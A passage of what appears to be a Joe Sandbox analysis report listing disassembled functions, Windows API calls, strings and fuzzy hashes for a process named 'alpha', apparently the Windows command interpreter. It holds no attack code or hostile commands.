                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E943359C
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335C3
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335D9
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335ED
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E9433602
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E94232F3
                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF6E94232A4), ref: 00007FF6E9423309
                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF6E9423384
                                                                                                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6E94411DF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 611521582-0
                                                                                                                                                                        • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                                                                                                        • Instruction ID: 85076ccb8cd57b1e8a4b0520062ee9e0d36cde55ca5ff42f6ec19b776ebd70f4
                                                                                                                                                                        • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                                                                                                        • Instruction Fuzzy Hash: C6A19C63B08612CAEB188F61A8543BD66A1FF4DB49F445135DE0EC7784DF3EA449C70A
                                                                                                                                                                        Function 00007FF6E94326E0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 187fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFile_open_osfhandle
                                                                                                                                                                        • String ID: con
                                                                                                                                                                        • API String ID: 2905481843-4257191772
                                                                                                                                                                        • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                                                                                        • Instruction ID: 77a4eea96e4cd48e4847b908c555b6a38946d185274eecfbb37fe0f7dbe8e67a
                                                                                                                                                                        • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                                                                                        • Instruction Fuzzy Hash: 1D716C73A08681CAE760CF34A444379BAA0FF8AB61F544234DE5A82794DF3ED44DCB05
                                                                                                                                                                        Function 00007FF6E9451A40 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 148COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                                                                                                        • String ID: CSVFS$NTFS$REFS
                                                                                                                                                                        • API String ID: 3510147486-2605508654
                                                                                                                                                                        • Opcode ID: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                                                                                                                                                        • Instruction ID: 5bcb3aaa87656f2fc5fdf34ada2e853312160800a6410138107d0a702ec0e852
                                                                                                                                                                        • Opcode Fuzzy Hash: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                                                                                                                                                        • Instruction Fuzzy Hash: AF614773608B82CAEB668F61D8543E977A5FF49B89F444139DA0D8B758DF3AD208C704
                                                                                                                                                                        Function 00007FF6E94272B0 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 283COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • longjmp.MSVCRT(?,00000000,00000000,00007FF6E9427279,?,?,?,?,?,00007FF6E942BFA9), ref: 00007FF6E9444485
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: longjmp
                                                                                                                                                                        • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                                                                                                                        • API String ID: 1832741078-366822981
                                                                                                                                                                        • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                                                                                        • Instruction ID: 57fa3baaa31f231f1fa34637a335536b21f16d78c2498b6e1262b0cfd5229404
                                                                                                                                                                        • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                                                                                        • Instruction Fuzzy Hash: 34C17C33E0C686C1E6289F9661507BC2792BF46B84FA04036DD0DD7791CE3EA64EC74A
                                                                                                                                                                        Function 00007FF6E942B998 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 275COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E942CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDA6
                                                                                                                                                                          • Part of subcall function 00007FF6E942CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDBD
                                                                                                                                                                        • memset.MSVCRT ref: 00007FF6E942BA2B
                                                                                                                                                                        • wcschr.MSVCRT ref: 00007FF6E942BA8A
                                                                                                                                                                        • wcschr.MSVCRT ref: 00007FF6E942BAAA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heapwcschr$AllocProcessmemset
                                                                                                                                                                        • String ID: -$:.\$=,;$=,;+/[] "
                                                                                                                                                                        • API String ID: 2872855111-969133440
                                                                                                                                                                        • Opcode ID: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                                                                                                                                                        • Instruction ID: c741827d3432e8becd184f326678a86fb24b8a6d6a9b4473d9a5374f40e753ab
                                                                                                                                                                        • Opcode Fuzzy Hash: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                                                                                                                                                        • Instruction Fuzzy Hash: 96B18023A0DA42C1EA608F25949437D67A4FF8AB84F954235CE5EC7794DF3EE449C30A
                                                                                                                                                                        Function 00007FF6E94286B0 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 138memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                                                                                        • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                                                                                                        • API String ID: 3223794493-3086019870
                                                                                                                                                                        • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                                                                                                                        • Instruction ID: 325189a407e551eaac11181667473d48774ef0d91f6da918dc57e357d9b1de40
                                                                                                                                                                        • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                                                                                                                        • Instruction Fuzzy Hash: 56517D76A08642C5EB148F65A8003BD7BA0FF49B90F188135C91E873A1EF3EE049C71A
                                                                                                                                                                        Function 00007FF6E9428B20 Relevance: 16.8, APIs: 11, Instructions: 254COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1944892715-0
                                                                                                                                                                        • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                                                                                        • Instruction ID: bd09b106be35f47bc70c954fda5148d5f205fe5e28627557b3a28b89fbc45013
                                                                                                                                                                        • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                                                                                        • Instruction Fuzzy Hash: F5B16D73A09742C6EB649F62A4543BD66A0FF59B80F448135CA4EC7391EF3EE448C70A
                                                                                                                                                                        Function 00007FF6E94486FC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 226timeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LocalTime$ErrorLast_get_osfhandle
                                                                                                                                                                        • String ID: %s$/-.$:
                                                                                                                                                                        • API String ID: 1644023181-879152773
                                                                                                                                                                        • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                                                                                        • Instruction ID: 5a0ab57edb512f36f9b822ff7e0aacd5c21040a458118f7d232b545be75b4d19
                                                                                                                                                                        • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                                                                                        • Instruction Fuzzy Hash: 73918C63A18642D1FF109F64D4503FA63A0FF84B94F844136DA4EC6795EE3EE54ACB0A
                                                                                                                                                                        Function 00007FF6E944627C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95synchronizationCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6E9447251), ref: 00007FF6E944628E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ObjectSingleWait
                                                                                                                                                                        • String ID: wil
                                                                                                                                                                        • API String ID: 24740636-1589926490
                                                                                                                                                                        • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                                                                                        • Instruction ID: 255320c338283de0839182fe880549dff577547de3df15074543336a7110aa62
                                                                                                                                                                        • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                                                                                        • Instruction Fuzzy Hash: E1412C33A08682C3F7604F55E40037A66B1EF86781F649131D90AC6A94DF3EE84EDF06
                                                                                                                                                                        Function 00007FF6E9427AA0 Relevance: 15.2, APIs: 10, Instructions: 221COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateDirectoryDriveFullNamePathTypememset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1397130798-0
                                                                                                                                                                        • Opcode ID: 1e06caf0b77d17d600aef2fcb22a4425febc896dd4a75ac9af5e73f825b2a127
                                                                                                                                                                        • Instruction ID: eab0ab2fa775c3779899e1419bec95fbfc8d371a018df17a62cd1ff2807a744d
                                                                                                                                                                        • Opcode Fuzzy Hash: 1e06caf0b77d17d600aef2fcb22a4425febc896dd4a75ac9af5e73f825b2a127
                                                                                                                                                                        • Instruction Fuzzy Hash: 3C919E33A48A82D6EB658F2194543B973E1FF88B84F448135DA4E83794DF3EE648C706
                                                                                                                                                                        Function 00007FF6E943258C Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 85COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E94306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E94306D6
                                                                                                                                                                          • Part of subcall function 00007FF6E94306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E94306F0
                                                                                                                                                                          • Part of subcall function 00007FF6E94306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E943074D
                                                                                                                                                                          • Part of subcall function 00007FF6E94306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E9430762
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF6E94325CA
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF6E94325E8
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF6E943260F
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF6E9432636
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF6E9432650
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmp$Heap$AllocProcess
                                                                                                                                                                        • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                                                                                                        • API String ID: 3407644289-1668778490
                                                                                                                                                                        • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                                                                                                        • Instruction ID: 9215073e53b5d72b3419e73aa678f15d5df475a5b5bd516f1ee2120d46fbed61
                                                                                                                                                                        • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                                                                                                        • Instruction Fuzzy Hash: 3A314D63A1C612C6F724AF71E8193793694AF85B80F548035EA0EC62E5DE3EE40DC70B
                                                                                                                                                                        Function 00007FF6E9437E80 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6E942D46E
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6E942D485
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D4EE
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: iswspace.MSVCRT ref: 00007FF6E942D54D
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D569
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D58C
                                                                                                                                                                        • iswspace.MSVCRT ref: 00007FF6E9437EEE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
